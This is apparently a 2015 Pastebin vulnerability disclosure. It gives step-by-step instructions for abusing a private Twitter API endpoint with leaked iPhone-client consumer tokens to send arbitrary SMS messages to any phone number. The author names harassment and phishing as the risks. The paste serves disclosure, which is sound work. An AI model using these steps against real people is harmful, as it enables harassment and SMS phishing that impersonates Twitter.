Guest User

Untitled

a guest
Apr 30th, 2015
3,421
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. The Twitter API contains a private endpoint that can be abused to send arbitrary text messages
  2. ----------------------------------------------------------------------------------------------
  3.  
  4. 2015-04-28
  5.  
  6. 1. get "Twitter for iPhone" consumer tokens, available on the web like here https://gist.github.com/rhenium/3878505
  7.  
  8. 2. use the XAuth flow https://dev.twitter.com/oauth/xauth to get access tokens valid for some user, say @nst022
  9.  
  10. 3. POST an OAuth signed request to https://api.twitter.com/1.1/device/register.json with the following parameters:
  11.  
  12. raw_phone_number: +41764448212
  13. text_message: Dahu
  14.  
  15. where "Dahu" can be an arbitrary message.
  16.  
  17. 4. the phone number used at point 3 receives a text message that reads "Dahu", plus a code
  18.  
  19. Here is a 23 seconds video that makes this scenario more visual: https://www.dropbox.com/s/4yzsfi8fnsrm3y5/twitter_api_abuse.mov?dl=0
  20.  
  21. You can reproduce the very same thing by using, say, STTwitter for OS X https://github.com/nst/STTwitter#demo--test-project
  22.  
  23. I can see two issues here:
  24.  
  25. a) this API endpoint can be used to harass people
  26.  
  27. b) this API endpoint can be used to trick victims into believing that the SMS was sent by Twitter and make them open a malicious URL or follow a malicious process
RAW Paste Data